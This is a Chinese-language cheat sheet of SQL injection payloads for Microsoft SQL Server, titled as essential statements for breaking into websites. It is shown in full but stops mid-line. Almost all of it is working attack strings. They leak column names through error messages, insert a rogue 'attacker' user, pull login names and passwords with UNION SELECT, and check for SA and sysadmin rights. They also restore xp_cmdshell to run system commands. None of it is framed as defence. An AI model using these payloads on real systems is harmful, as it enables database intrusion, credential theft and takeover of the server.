入侵网站必备Sql语句:(经典语句)

核心提示： group by users.id having 1=1--group by users.id, users.username,users.password, users.privs having 1= 1--; insert into users values( 666,attacker

group by users.id having 1=1--
group by users.id, users.username,
users.password, users.privs having 1= 1--
; insert into users values( 666,
attacker, foobar, 0xffff )--
UNION SELECT TOP 1 COLUMN_NAME
FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE
_NAME=logintable-
UNION SELECT TOP 1 COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE
COLUMN_NAME NOT IN (login_id)-
UNION SELECT TOP 1
COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN
(login_id,login_name)-
UNION SELECT TOP 1
login _name FROM logintable-
UNION SELECT TOP 1 password FROM
logintable where login_name=Rahul--

看服务器打的补丁=出错了打了SP4补丁

and 1=(select @@VERSION)--

看数据库连接账号的权限，返回正常，证明是服务器角色sysadmin权限。

and

1=(SELECT IS_SRVROLEMEMBER(sysadmin))--

判断连接数据库帐号。（采用SA账号连接 返回正常=证明了连接账号是SA）

and sa=(SELECT

System_user)--

and user_name()=dbo--

and

0(select user_name()--

看xp_cmdshell是否删除

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name =

xp_cmdshell)--

xp_cmdshell被删除，恢复,支持绝对路径的恢复

;EXEC

master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--

;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c: